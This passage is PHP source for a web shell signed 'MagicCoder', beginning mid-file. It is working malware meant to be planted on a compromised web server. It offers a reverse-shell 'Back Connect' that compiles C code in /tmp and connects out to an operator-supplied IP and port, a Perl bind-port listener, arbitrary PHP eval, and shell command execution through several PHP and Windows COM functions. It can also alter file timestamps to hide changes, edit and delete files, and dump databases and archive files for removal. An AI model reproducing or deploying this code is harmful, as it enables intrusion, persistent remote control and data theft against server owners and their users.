'; cf('/tmp/magiccoder_bc.c',$back_connect_c); switch ($_POST['execfunction_cb']) { case 'system': $res = @system('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c'); @unlink('/tmp/magiccoder_bc.c'); $res = @system("/tmp/magiccoder_bc $yourip $yourport &"); break; case 'passthru': $res = @passthru('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c'); @unlink('/tmp/magiccoder_bc.c'); $res = @passthru("/tmp/magiccoder_bc $yourip $yourport &"); break; case 'exec': $res = @exec('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c'); @unlink('/tmp/magiccoder_bc.c'); $res = @exec("/tmp/magiccoder_bc $yourip $yourport &"); break; case 'execute': $res = execute('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c'); @unlink('/tmp/magiccoder_bc.c'); $res = execute("/tmp/magiccoder_bc $yourip $yourport &"); break; case 'shell_exec': $res = @shell_exec('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c'); @unlink('/tmp/magiccoder_bc.c'); $res = @shell_exec("/tmp/magiccoder_bc $yourip $yourport &"); break; case 'popen': $res = @fread(popen('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c',r), 9999); @unlink('/tmp/magiccoder_bc.c'); $res = @fread(popen("/tmp/magiccoder_bc $yourip $yourport &",r), 9999); break; } } m("Now script try connect to $yourip port $yourport ..."); echo '
Use from '.$_POST['execfunction_cb'].' function
'; } formhead(array('title'=>'Back Connect')); makehide('action','net'); p('

'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:'); makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); echo "Function: \n"; makeinput(array('name'=>'start_cb','value'=>'Start','type'=>'submit','class'=>'bt')); p('

'); formfoot(); //////////////// !$yourport_bind && $yourport_bind = '13700527'; $usedb = array('perl'=>'perl'); if ($start_bind && $yourport && $use){ if ($use == 'perl') { cf('/tmp/magiccoder_bind_pl',$bind_pl); switch ($_POST['execfunction_bind']) { case 'system': $res = @system(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &"); break; case 'passthru': $res = @passthru(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &"); break; case 'exec': $res = @exec(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &"); break; case 'execute': $res = @execute(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &"); break; case 'shell_exec': $res = @shell_exec(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &"); break; case 'popen': $res = @fread(popen(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &",r), 9999); break; } } m("bind on port $yourport_bind Started..."); echo '
Use from '.$_POST['execfunction_bind'].' function
'; } formhead(array('title'=>'Bind Port')); makehide('action','net'); p('

'); p('Your Port:'); makeinput(array('name'=>'yourport_bind','size'=>15,'value'=>$yourport_bind)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); echo "Function: \n"; makeinput(array('name'=>'start_bind','value'=>'Start','type'=>'submit','class'=>'bt')); p('

'); formfoot(); }//end sql backup elseif ($action == 'eval') { $phpcode = trim($phpcode); if($phpcode){ if (!preg_match('#<\?#si', $phpcode)) { $phpcode = ""; } eval("?".">$phpcode'Eval PHP Code')); makehide('action','eval'); maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); formfooter(); }//end eval elseif ($action == 'editfile') { if(file_exists($opfile)) { $fp=@fopen($opfile,'r'); $contents=@fread($fp, filesize($opfile)); @fclose($fp); $contents=htmlspecialchars($contents); } formhead(array('title'=>'Create / Edit File')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); formfooter(); }//end editfile elseif ($action == 'newtime') { $opfilemtime = @filemtime($opfile); //$time = strtotime("$year-$month-$day $hour:$minute:$second"); $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); formhead(array('title'=>'Clone file was last modified time')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); formfooter(); formhead(array('title'=>'Set last modified')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); p('

Instead »'); p('year:'); makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); p('month:'); makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); p('day:'); makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); p('hour:'); makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); p('minute:'); makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); p('second:'); makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); p('

'); formfooter(); }//end newtime elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if($program && $parameter) { $shell= new COM('Shell.Application'); $a = $shell->ShellExecute($program,$parameter); m('Program run has '.(!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; formhead(array('title'=>'Execute Program')); makehide('action','shell'); makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); p('

'); makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); } formhead(array('title'=>'Execute Command')); makehide('action','shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); } p('

'); makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); if (!IS_WIN && !IS_COM){ echo "\n"; } makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); if ($command) { p('
		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
			$wsh = new COM('WScript.shell');
			$exec = $wsh->exec('cmd.exe /c '.$command);
			$stdout = $exec->StdOut();
			$stroutput = $stdout->ReadAll();
			echo $stroutput;
		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
			$descriptorspec = array(
			   0 => array('pipe', 'r'),
			   1 => array('pipe', 'w'),
			   2 => array('pipe', 'w')
			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
			if (is_resource($process)) {
				fwrite($pipes[0], $command."\r\n");
				fwrite($pipes[0], "exit\r\n");
				while (!feof($pipes[1])) {
					echo fgets($pipes[1], 1024);
				while (!feof($pipes[2])) {
					echo fgets($pipes[2], 1024);
		} else {
			echo '
Use from '.$_POST['execfunction'].' function
'; switch ($_POST['execfunction']) { case 'system': @system($command); break; case 'passthru': @passthru($command); break; case 'exec': echo @exec($command); break; case 'execute': echo @execute($command); break; case 'shell_exec': echo @shell_exec($command); break; case 'popen': echo @fread(popen($command,r), 9999); break; } } p('
'); } }//end shell elseif ($action == 'phpenv') { $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array( 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), 2 => array('Server Domain',$_SERVER['SERVER_NAME']), 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS',PHP_OS), 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), 8 => array('PHP run mode',strtoupper(php_sapi_name())), 9 => array('The file path',__FILE__), 10 => array('PHP Version',PHP_VERSION), 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), 12 => array('Safe Mode',getcfg('safe_mode')), 13 => array('Administrator',$adminmail), 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), 15 => array('enable_dl',getcfg('enable_dl')), 16 => array('display_errors',getcfg('display_errors')), 17 => array('register_globals',getcfg('register_globals')), 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), 19 => array('memory_limit',getcfg('memory_limit')), 20 => array('post_max_size',getcfg('post_max_size')), 21 => array('upload_max_filesize',$upsize), 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), 23 => array('disable_functions',$dis_func), ); if($phpvarname) { m($phpvarname .' : '.getcfg($phpvarname)); } formhead(array('title'=>'Server environment')); makehide('action','phpenv'); makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); formfooter(); $hp = array(0=> 'Server', 1=> 'PHP'); for($a=0;$a<2;$a++) { p('

'.$hp[$a].' »

'); p(''); } }//end phpenv else { m('Undefined Action'); echo '

'; // ²é¿´PHPINFO if ($action == 'phpinfo') { if (IS_PHPINFO) { phpinfo(); } else { $errmsg = 'phpinfo() function has non-permissible'; } } } ?>
By MagicCoder
'; echo $msg; echo ''; } function scookie($key, $value, $life = 0, $prefix = 1) { global $admin, $timestamp, $_SERVER; $key = ($prefix ? $admin['cookiepre'] : '').$key; $life = $life ? $life : $admin['cookielife']; $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport); } function multi($num, $perpage, $curpage, $tablename) { $multipage = ''; if($num > $perpage) { $page = 10; $offset = 5; $pages = @ceil($num / $perpage); if($page > $pages) { $from = 1; $to = $pages; } else { $from = $curpage - $offset; $to = $curpage + $page - $offset - 1; if($from < 1) { $to = $curpage + 1 - $from; $from = 1; if(($to - $from) < $page && ($to - $from) < $pages) { $to = $page; } } elseif($to > $pages) { $from = $curpage - $pages + $to; $to = $pages; if(($to - $from) < $page && ($to - $from) < $pages) { $from = $pages - $page + 1; } } } $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); for($i = $from; $i <= $to; $i++) { $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; } $multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); $multipage = $multipage ? '

Pages: '.$multipage.'

' : ''; } return $multipage; } // µÇ½Èë¿Ú function loginpage() { ?> Password: Can not connect to MySQL server'); exit; } if($link && $dbname) { if (!@mysql_select_db($dbname, $link)) { p('

Database selected has error

'); exit; } } if($link && mysql_get_server_info() > '4.1') { if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) { q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); } } return $link; } // È¥µôתÒå×Ö·û function s_array(&$array) { if (is_array($array)) { foreach ($array as $k => $v) { $array[$k] = s_array($v); } } else if (is_string($array)) { $array = stripslashes($array); } return $array; } // Çå³ýHTML´úÂë function html_clean($content) { $content = htmlspecialchars($content); $content = str_replace("\n", "
", $content); $content = str_replace(" ", "  ", $content); $content = str_replace("\t", "    ", $content); return $content; } // »ñȡȨÃ�Þ function getChmod($filepath){ return substr(base_convert(@fileperms($filepath),10,8),-4); } function getPerms($filepath) { $mode = @fileperms($filepath); if (($mode & 0xC000) === 0xC000) {$type = 's';} elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} elseif (($mode & 0x8000) === 0x8000) {$type = '-';} elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} else {$type = '?';} $owner['read'] = ($mode & 00400) ? 'r' : '-'; $owner['write'] = ($mode & 00200) ? 'w' : '-'; $owner['execute'] = ($mode & 00100) ? 'x' : '-'; $group['read'] = ($mode & 00040) ? 'r' : '-'; $group['write'] = ($mode & 00020) ? 'w' : '-'; $group['execute'] = ($mode & 00010) ? 'x' : '-'; $world['read'] = ($mode & 00004) ? 'r' : '-'; $world['write'] = ($mode & 00002) ? 'w' : '-'; $world['execute'] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; } function getUser($filepath) { if (function_exists('posix_getpwuid')) { $array = @posix_getpwuid(@fileowner($filepath)); if ($array && is_array($array)) { return ' / '.$array['name'].''; } } return ''; } // ɾ³ýĿ¼ function deltree($deldir) { $mydir=@dir($deldir); while(@$file=$mydir->read()) { if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { @chmod($deldir.'/'.$file,0777); deltree($deldir.'/'.$file); } if (is_file($deldir.'/'.$file)) { @chmod($deldir.'/'.$file,0777); @unlink($deldir.'/'.$file); } } $mydir->close(); @chmod($deldir,0777); return @rmdir($deldir) ? 1 : 0; } // ±í¸ñÃ�Ã�¼äµÄ±³¾°É«Ìæ»» function bg() { global $bgc; return ($bgc++%2==0) ? 'alt1' : 'alt2'; } // »ñÈ¡µ±Ç°µÄÎļþÃ�µÃ�³Â·¾¶ function getPath($scriptpath, $nowpath) { if ($nowpath == '.') { $nowpath = $scriptpath; } $nowpath = str_replace('\\', '/', $nowpath); $nowpath = str_replace('//', '/', $nowpath); if (substr($nowpath, -1) != '/') { $nowpath = $nowpath.'/'; } return $nowpath; } // »ñÈ¡µ±Ç°Ä¿Â¼µÄÉÃ�¼¶Ä¿Â¼ function getUpPath($nowpath) { $pathdb = explode('/', $nowpath); $num = count($pathdb); if ($num > 2) { unset($pathdb[$num-1],$pathdb[$num-2]); } $uppath = implode('/', $pathdb).'/'; $uppath = str_replace('//', '/', $uppath); return $uppath; } // ¼ì²éPHPÅäÖòÎÊý function getcfg($varname) { $result = get_cfg_var($varname); if ($result == 0) { return 'No'; } elseif ($result == 1) { return 'Yes'; } else { return $result; } } // ¼ì²éº¯ÊýÇé¿ö function getfun($funName) { return (false !== function_exists($funName)) ? 'Yes' : 'No'; } function GetList($dir){ global $dirdata,$j,$nowpath; !$j && $j=1; if ($dh = @opendir($dir)) { while ($file = readdir($dh)) { $f=str_replace('//','/',$dir.'/'.$file); if($file!='.' && $file!='..' && is_dir($f)){ if (is_writable($f)) { $dirdata[$j]['filename']=str_replace($nowpath,'',$f); $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); $dirdata[$j]['dirchmod']=getChmod($f); $dirdata[$j]['dirperm']=getPerms($f); $dirdata[$j]['dirlink']=ue($dir); $dirdata[$j]['server_link']=$f; $dirdata[$j]['client_link']=ue($f); $j++; } GetList($f); } } closedir($dh); clearstatcache(); return $dirdata; } else { return array(); } } function qy($sql) { //echo $sql.'
'; $res = $error = ''; if(!$res = @mysql_query($sql)) { return 0; } else if(is_resource($res)) { return 1; } else { return 2; } return 0; } function q($sql) { return @mysql_query($sql); } function fr($qy){ mysql_free_result($qy); } function sizecount($size) { if($size > 1073741824) { $size = round($size / 1073741824 * 100) / 100 . ' G'; } elseif($size > 1048576) { $size = round($size / 1048576 * 100) / 100 . ' M'; } elseif($size > 1024) { $size = round($size / 1024 * 100) / 100 . ' K'; } else { $size = $size . ' B'; } return $size; } // ѹËõ´ò°üÀà class PHPZip{ var $out=''; function PHPZip($dir) { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir);//Îļþ��±í foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, 'r'); $content = @fread ($fd, filesize($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); } return 1; } else return 0; } // »ñµÃÖ¸¶¨Ä¿Â¼Îļþ��±í function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while ($file = readdir($dh)) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } // end if return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } // ±¸·�Êý¾�¿â function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = q("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } fr($fields); $keys = q("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" && $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } fr($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = q("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } } fr($rows); if ($fp) { fwrite($fp,"\n"); } else { echo "\n"; } } function ue($str){ return urlencode($str); } function p($str){ echo $str."\n"; } function tbhead() { p(''); } function tbfoot(){ p('
'); } function makehide($name,$value=''){ p(""); } function makeinput($arg = array()){ $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; !$arg['type'] && $arg['type'] = 'text'; $arg['title'] = $arg['title'] ? $arg['title'].'
' : ''; $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; if ($arg['newline']) { p("


"); } else { p("$arg[title]"); } } function makeselect($arg = array()){ if ($arg['onchange']) { $onchange = 'onchange="'.$arg['onchange'].'"'; } $arg['title'] = $arg['title'] ? $arg['title'] : ''; if ($arg['newline']) p('

'); p("$arg[title] "); if ($arg['newline']) p('

'); } function formhead($arg = array()) { !$arg['method'] && $arg['method'] = 'post'; !$arg['action'] && $arg['action'] = $self; $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; !$arg['name'] && $arg['name'] = 'form1'; p("
"); if ($arg['title']) { p('

'.$arg['title'].' »

'); } } function maketext($arg = array()){ !$arg['cols'] && $arg['cols'] = 100; !$arg['rows'] && $arg['rows'] = 25; $arg['title'] = $arg['title'] ? $arg['title'].'
' : ''; p("


"); } function formfooter($name = ''){ !$name && $name = 'submit'; p('

'); p('
'); } function formfoot(){ p(''); } // µ÷ÊÔº¯Êý function pr($a) { echo '
	echo '
'; } ?>